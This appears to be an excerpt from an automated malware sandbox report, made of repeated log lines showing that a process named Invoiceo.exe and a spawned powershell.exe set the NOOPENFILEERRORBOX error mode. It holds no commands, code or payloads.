Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
